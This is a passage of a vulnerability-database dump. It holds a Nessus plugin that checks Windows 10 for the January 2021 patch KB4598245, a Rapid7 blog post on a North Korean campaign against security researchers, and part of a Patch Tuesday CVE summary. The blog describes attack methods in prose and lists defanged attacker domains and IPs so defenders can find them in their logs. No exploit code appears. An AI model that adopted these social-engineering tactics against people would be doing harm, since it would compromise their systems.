Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598245: Windows 10 Version 1803 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1682", "CVE-2021-1681", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1685", "CVE-2021-1638", "CVE-2021-1687", "CVE-2021-1664", "CVE-2021-1697", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1669", "CVE-2021-1673", "CVE-2021-1662", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1642", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1670", "CVE-2021-1689", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1680", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1651", "CVE-2021-1708", "CVE-2021-1672", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1637", "CVE-2021-1686", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1663", "CVE-2021-1690", "CVE-2021-1660", "CVE-2021-1646", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657", "CVE-2021-1705"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598245.NASL", "href": "https://www.tenable.com/plugins/nessus/144880", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144880);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/12\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015\");\n script_xref(name:\"MSKB\", value:\"4598245\");\n script_xref(name:\"MSFT\", value:\"MS21-4598245\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598245: Windows 10 Version 1803 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598245/windows-10-update-kb4598245\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8f58c04\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598245.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598245'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598245])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-02-05T20:48:49", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "\n\n_This blog was co-authored by Caitlin Condon, VRM Security Research Manager, and Bob Rudis, Senior Director and Chief Security Data Scientist._\n\nOn Monday, Jan. 25, 2021, Google\u2019s Threat Analysis Group (TAG) [published a blog on a widespread social engineering campaign](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) that targeted security researchers working on vulnerability research and development. The campaign, which Google attributed to North Korean (DPRK) state-sponsored actors, has been active for several months and sought to compromise researchers using several methods.\n\nRapid7 is aware that many security researchers were targeted in this campaign, and information is still developing. While we currently have no evidence that we were compromised, we are continuing to investigate logs and examine our systems for any of the [IOCs listed in Google\u2019s analysis](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>). We will update this post with further information as it becomes available.\n\nOrganizations should take note that this was a highly sophisticated attack that was important enough to those who orchestrated it for them to burn an as-yet unknown exploit path on. This event is the latest in a chain of attacks\u2014e.g., those targeting SonicWall, VMware, Mimecast, Malwarebytes, Microsoft, Crowdstrike, and SolarWinds\u2014that demonstrates a significant increase in threat activity targeting cybersecurity firms with legitimately sophisticated campaigns. Scenarios like these should become standard components of tabletop exercises and active defense plans.\n\n## North Korean-attributed social engineering campaign\n\nGoogle discovered that the DPRK threat actors had built credibility by establishing a vulnerability research blog and several Twitter profiles to interact with potential targets. They published videos of their alleged exploits, including a YouTube video of a fake proof-of-concept (PoC) exploit for CVE-2021-1647\u2014a [high-profile Windows Defender zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647>) that garnered attention from both security researchers and the media. The DPRK actors also published \u201cguest\u201d research (likely plagiarized from other researchers) on their blog to further build their reputation.\n\nThe malicious actors then used two methods to social engineer targets into accepting malware or visiting a malicious website. [According to Google](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>):\n\n * After establishing initial communications, **the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project.** Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional pre-compiled library (DLL) that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled command and control (C2) domains.\nVisual Studio Build Events command executed when building the provided VS Project files. Image provided by Google.\n\n * In addition to targeting users via social engineering, Google also observed several cases where researchers have been compromised after visiting the actors\u2019 blog. In each of these cases, the researchers followed a link on Twitter to a write-up hosted on `blog[.]br0vvnn[.]io`, and shortly thereafter, a malicious service was installed on the researcher\u2019s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. **At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.** As of Jan. 26, 2021, Google was unable to confirm the mechanism of compromise.\n\nThe blog the DPRK threat actors used to execute this zero-day drive-by attack was posted on Reddit as long as three months ago. The actors also used a range of social media and communications platforms to interact with targets\u2014including Telegram, Keybase, Twitter, LinkedIn, and Discord. As of Jan. 26, 2021, many of these profiles have been suspended or deactivated.\n\n## Rapid7 customers\n\nGoogle\u2019s threat intelligence includes information on IOCs, command-and-control domains, actor-controlled social media accounts, and compromised domains used as part of the campaign. Rapid7's MDR team is deploying IOCs and behavior-based detections. These detections will also be available to InsightIDR customers later today. We will update this blog post with further information as it becomes available.\n\n## Defender guidance\n\nTAG noted in their blog post that **they have so far only seen actors targeting Windows systems.** As of the evening of Jan. 25, 2021, researchers across many companies [confirmed on Twitter](<https://twitter.com/richinseattle/status/1353864756109578241>) that they had interacted with the DPRK actors and/or visited the malicious blog. Organizations that believe their researchers or other employees may have been targeted should conduct internal investigations to determine whether indicators of compromise are present on their networks.\n\nAt a minimum, responders should:\n\n * Ensure members of all security teams are aware of this campaign and encourage individuals to report if they believe they were targeted by these actors.\n * Search web traffic, firewall, and DNS logs for evidence of contacts to the domains and URLs provided by Google in their post.\n * According to [Rapid7 Labs\u2019 forward DNS archive](<https://opendata.rapid7.com>), the `br0vvnn[.]io` apex domain has had two discovered fully qualified domain names (FQDNs)\u2014`api[.]br0vvnn[.]io` and `blog[.]br0vvnn[.]io`\u2014over the past four months with IP addresses `192[.]169[.]6[.]31` and `192[.]52[.]167[.]169`, respectively. Contacts to those IPs should also be investigated in historical access records.\n * Check for evidence of the provided hashes on all systems, starting with those operated and accessed by members of security teams.\n\nMoving forward, organizations and individuals should heed Google\u2019s advice that _\u201cif you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research.\u201d_\n\n## Updates\n\n2021-02-05 \u2022 As Rapid7 is a cybersecurity vendor with many security researchers on staff, we began an internal investigation immediately after this campaign was disclosed to determine if there was any impact to us or our researchers. We have completed our investigation and have found no evidence of compromise. If or when new information arises, we will perform additional investigations and provide further updates at that time.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "modified": "2021-01-26T15:01:33", "published": "2021-01-26T15:01:33", "id": "RAPID7BLOG:BE902C7628D3F969596F8BE1DD0207C1", "href": "https://blog.rapid7.com/2021/01/26/state-sponsored-threat-actors-target-security-researchers/", "type": "rapid7blog", "title": "State-Sponsored Threat Actors Target Security Researchers", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T00:48:37", "bulletinFamily": "info", "cvelist": ["CVE-2020-26870", "CVE-2021-1636", "CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1641", "CVE-2021-1642", "CVE-2021-1643", "CVE-2021-1644", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1677", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1703", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1707", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710", "CVE-2021-1711", "CVE-2021-1712", "CVE-2021-1713", "CVE-2021-1714", "CVE-2021-1715", "CVE-2021-1716", "CVE-2021-1717", "CVE-2021-1718", "CVE-2021-1719", "CVE-2021-1723", "CVE-2021-1725"], "description": "\n\nWe arrive at the first Patch Tuesday of 2021 ([2021-Jan](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan>)) with 83 vulnerabilities across our standard spread of products. Windows Operating System vulnerabilities dominated this month's advisories, followed by Microsoft Office (which includes the SharePoint family of products), and lastly some from less frequent products such as Microsoft System Center and Microsoft SQL Server.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 65 \nESU | 35 \nMicrosoft Office | 11 \nDeveloper Tools | 5 \nSQL Server | 1 \nApps | 1 \nSystem Center | 1 \nAzure | 1 \nBrowser | 1 \n \n### [Microsoft Defender Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>) (CVE-2021-1647)\n\nCVE-2021-1647 is marked as a CVSS 7.8, actively exploited, remote code execution vulnerability through the Microsoft Malware Protection Engine (mpengine.dll) between version 1.1.17600.5 up to 1.1.17700.4. \n\nAs a default, Microsoft's affected antimalware software will automatically keep the Microsoft Malware Protection Engine up to date. What this means, however, is that no further action is needed to resolve this vulnerability unless non-standard configurations are used. \n\nThis vulnerability affects Windows Defender or the supported Endpoint Protection pieces of the System Center family of products (2012, 2012 R2, and namesake version: Microsoft System Center Endpoint Protection).\n\n### Patching Windows Operating Systems Next\n\nAnother confirmation of the standard advice of prioritizing Operating System patches whenever possible is that 11 of the 13 top CVSS-scoring (CVSSv3 8.8) vulnerabilities addressed in this month's Patch Tuesday would be immediately covered through these means. As an interesting observation, the Windows Remote Procedure Call Runtime component appears to have been given extra scrutiny this month. This RPC Runtime component accounts for the 9 of the 13 top CVSS scoring vulnerabilities along with half of all the 10 Critical Remote Code Execution vulnerabilities being addressed.\n\n### More Work to be Done\n\nLastly, some minor calls to note that this Patch Tuesday includes SQL Server as that is an atypical family covered during Patch Tuesdays and, arguably more notable, is a reminder that [Adobe Flash has officially reached end-of-life](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support>) and would've been actively removed from all browsers via Windows Update (already).\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1677](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1677>) | Azure Active Directory Pod Identity Spoofing Vulnerability | No | No | 5.5 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1705](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1705>) | Microsoft Edge (HTML-based) Memory Corruption Vulnerability | No | No | 4.2 | No \n \n## Developer Tools Vulnerabilities\n\ncve | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2020-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870>) | Visual Studio Remote Code Execution Vulnerability | No | No | 7 | Yes \n[CVE-2021-1725](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1725>) | Bot Framework SDK Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1723](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1723>) | ASP.NET Core and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Developer Tools Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1651>) | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1680](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1680>) | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1715](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1715>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1716](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1716>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1641>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-1717](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1717>) | 